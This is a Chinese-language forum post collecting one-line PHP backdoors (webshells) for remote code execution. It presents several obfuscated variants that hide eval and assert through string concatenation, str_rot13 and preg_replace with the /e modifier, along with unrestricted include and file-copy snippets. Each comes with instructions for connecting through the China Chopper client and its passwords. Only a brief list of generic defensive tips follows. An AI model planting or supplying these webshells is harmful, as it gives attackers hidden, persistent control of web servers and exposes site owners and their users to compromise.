HanDs
NO.2

php一句话强悍后门 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

三个变形的一句话PHP木马


第一个


<?php ($_=@$_GET[2]).@$_($_POST[1])?> 

//在菜单里写http://site/1.php?2=assert密码是1


第二个


<?php $_="";  $_[+""]='';  $_="$_"."";  $_=($_[+""]|"").($_[+""]|"").($_[+""]^"");  ?> 

<?php ${'_'.$_}['_'](${'_'.$_}['__']);?> 

//在菜刀里写http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass。如果你用菜刀的附加数据的话更隐蔽,或者用其它注射工具也可以,因为是post提交的。


第三个


($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add'); str_rot13(‘riny’)//即编码后的eval,完全避开了关键字,又不失效果,让人吐血!


最后列几个高级的PHP一句话木马后门:


1、  $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";  $hh("/[discuz]/e",$_POST['h'],"Access");  //菜刀一句话  2、  $filename=$_GET['xbid'];  include ($filename);  //危险的include函数,直接编译任何文件为php格式运行  

3、  $reg="c"."o"."p"."y";  $reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);  //重命名任何文件  

4、  $gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";  $gzid("/[discuz]/e",$_POST['h'],"Access");  //菜刀一句话  

5、include ($uid);  //危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif  //gif插一句话  

6、典型一句话  程序后门代码  <?php eval_r($_POST[sb])?> 程序代码  <?php @eval_r($_POST[sb])?> //容错代码  程序代码  <?php assert($_POST[sb]);?> //使用lanker一句话客户端的专家模式执行相关的php语句  程序代码  <?$_POST['sa']($_POST['sb']);?> 程序代码  <?$_POST['sa']($_POST['sb'],$_POST['sc'])?> 程序代码  <?php @preg_replace("/[email]/e",$_POST['h'],"error");  ?> //使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入  程序代码  <O>[email protected]_r($_POST1);</O> 程序代码  <script language="php">@eval_r($_POST[sb])</script> //绕过<?限制的一句话 综上,这些PHP一句话后门可谓五脏俱全,一不小心您肯定中招了,而我们今天这篇文章的重中之重在哪呢?重点就在下边的总结!


如何应对PHP一句话后门:


我们强调几个关键点,看这文章的你相信不是门外汉,我也就不啰嗦了:


1,对PHP程序编写要有安全意识

2,服务器日志文件要经常看,经常备份

3,对每个站点进行严格的权限分配

4,对动态文件及目录经常批量安全审查

5,学会如何进行手工杀毒《即行为判断查杀》

6,时刻关注,或渗入活跃的网络安全营地

7,对服务器环境层级化处理,哪怕一个函数也可做规则我们认为当管理的站点多了,数据量大时,我们应合理应用一些辅助工具,但不应完全依赖这些工具,技术是时刻在更新进步的,最为重要的是你应学会和理解,编写这些强悍后门的人所处思维,角色上的换位可为你带来更大的进步。


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
php 一句话强悍后门
#1楼
发帖时间:2016-9-18   |   查看数:0   |   回复数:0
游客组